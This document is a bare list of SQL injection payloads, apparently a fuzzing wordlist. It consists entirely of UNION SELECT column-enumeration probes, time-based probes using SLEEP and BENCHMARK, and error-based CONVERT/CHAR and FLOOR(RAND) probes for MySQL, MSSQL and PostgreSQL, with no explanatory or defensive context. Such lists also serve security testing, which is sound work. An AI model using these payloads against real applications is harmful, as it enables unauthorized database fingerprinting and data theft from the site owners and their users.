 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- &#13;
 UNION SELECT @@VERSION,SLEEP(5),3&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),4&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30&#13;
 UNION SELECT @@VERSION,SLEEP(5),"'3&#13;
 UNION SELECT @@VERSION,SLEEP(5),"'3'"#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),4#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#&#13;
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#&#13;
 UNION ALL SELECT USER()-- &#13;
 UNION ALL SELECT SLEEP(5)-- &#13;
 UNION ALL SELECT USER(),SLEEP(5)-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5)-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &#13;
 UNION ALL SELECT NULL-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))-- &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))-- &#13;
 UNION ALL SELECT NULL#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#&#13;
 UNION ALL SELECT NULL &#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))&#13;
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))&#13;
 AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))&#13;
 AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)&#13;
 AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&#13;
